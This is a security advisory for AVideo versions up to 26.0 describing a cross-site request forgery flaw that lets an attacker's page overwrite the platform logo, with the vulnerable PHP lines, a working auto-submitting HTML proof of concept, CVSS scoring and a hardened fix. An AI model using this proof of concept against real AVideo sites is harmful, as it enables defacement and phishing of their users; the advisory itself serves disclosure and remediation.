CSRF on Site Customization Endpoint Enables Logo Overwrite via Base64 File Write

Moderate
DanielnetoDotCom published GHSA-5572-2jgx-fc7c Apr 1, 2026

Software

WWBN/AVideo

Affected versions

<= 26.0

Patched versions

None

Description

Severity: Medium
CWE: CWE-352 (Cross-Site Request Forgery)

Summary

The site customization endpoint at admin/customize_settings_nativeUpdate.json.php lacks CSRF token validation and writes uploaded logo files to disk before the ORM's domain-based security check executes. Combined with SameSite=None cookie policy, a cross-origin POST can overwrite the platform's logo with attacker-controlled content.

Details

The endpoint admin/customize_settings_nativeUpdate.json.php processes logo uploads via base64-encoded POST data:

$fileData = base64DataToImage($_POST['logoImgBase64']);
$bytes = file_put_contents($global['systemRootPath'] . $photoURL, $fileData);

The file_put_contents() call executes before the ORM save() call. The ORM includes a Referer/Origin domain check that will reject the subsequent configuration title change from a cross-origin request, but by that point the file has already been written to disk. The logo overwrite succeeds even though the ORM blocks other changes.

Because AVideo sets SameSite=None on session cookies, the admin's authenticated session is included in cross-origin POST requests. No CSRF token is required by the endpoint.

Proof of Concept

Host the following HTML on an attacker-controlled domain. When an authenticated admin visits the page, their site logo is replaced.

<!DOCTYPE html>
<html>
<head><title>CSRF Logo Overwrite</title></head>
<body>
<h1>Loading...</h1>
<script>
// Minimal 1x1 red pixel PNG encoded as base64 data URI
var maliciousLogo = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z8BQDwADhQGAWjR9awAAAABJRU5ErkJggg==";

var form = document.createElement("form");
form.method = "POST";
form.action = "https://your-avideo-instance.com/admin/customize_settings_nativeUpdate.json.php";

var input = document.createElement("input");
input.type = "hidden";
input.name = "logoImgBase64";
input.value = maliciousLogo;
form.appendChild(input);

document.body.appendChild(form);
form.submit();
</script>
</body>
</html>

Impact

  • Platform logo replaced with attacker-controlled image (defacement)
  • Phishing potential: logo can be replaced with a misleading image containing fraudulent instructions
  • The file write is irreversible without manual admin intervention
  • ORM security check provides a false sense of protection since the file write occurs first

Recommended Fix

Add CSRF token validation at admin/customize_settings_nativeUpdate.json.php:10, before processing any POST data or file writes:

// admin/customize_settings_nativeUpdate.json.php:10
if (!isGlobalTokenValid()) {
    die('{"error":"Invalid CSRF token"}');
}

This must be placed before the base64DataToImage() and file_put_contents() calls to prevent the file write from executing on forged requests.
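The ordering the fix calls for, as an added example that is not AVideo's own code: every rejection (CSRF token, Origin check, payload validation) happens before base64DataToImage() and file_put_contents(). isGlobalTokenValid(), base64DataToImage(), $global['systemRootPath'] and $photoURL are the names used on this page; the Origin comparison, the size limit and the getimagesizefromstring() check are assumptions added for defence in depth.

```php
<?php
// Added example (not AVideo's code): hardened handler ordering for a logo update.
// Nothing below touches the filesystem until all checks have passed.

header('Content-Type: application/json');

// 1. CSRF token first. A cross-origin form post cannot carry a valid token,
//    so a forged request dies here, before any decoding or disk write.
//    isGlobalTokenValid() is the AVideo helper named in the advisory.
if (!isGlobalTokenValid()) {
    die(json_encode(['error' => 'Invalid CSRF token']));
}

// 2. Defence in depth: when the browser sends an Origin header, its host must
//    equal our own host (assumption: $_SERVER['HTTP_HOST'] is trustworthy here).
if (!empty($_SERVER['HTTP_ORIGIN'])) {
    $originHost = parse_url($_SERVER['HTTP_ORIGIN'], PHP_URL_HOST);
    $siteHost   = parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST);
    if (!$originHost || !$siteHost || strcasecmp($originHost, $siteHost) !== 0) {
        die(json_encode(['error' => 'Cross-origin request rejected']));
    }
}

// 3. Only now look at the upload: bounded size and an image data URI prefix.
$raw = $_POST['logoImgBase64'] ?? '';
if (strlen($raw) > 2 * 1024 * 1024
    || !preg_match('#^data:image/(png|jpeg|gif);base64,#', $raw)) {
    die(json_encode(['error' => 'Unsupported logo payload']));
}
$fileData = base64DataToImage($raw); // AVideo helper named in the advisory

// 4. Verify the decoded bytes really are an image before writing anything.
if (!$fileData || @getimagesizefromstring($fileData) === false) {
    die(json_encode(['error' => 'Logo is not a valid image']));
}

// 5. Disk write and ORM save come last, after every check has passed.
$bytes = file_put_contents($global['systemRootPath'] . $photoURL, $fileData);
echo json_encode(['error' => false, 'bytes' => $bytes]);
```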


Found by aisafe.io

Severity

Moderate

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE ID

CVE-2026-35180

Weaknesses

Cross-Site Request Forgery (CSRF)

The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.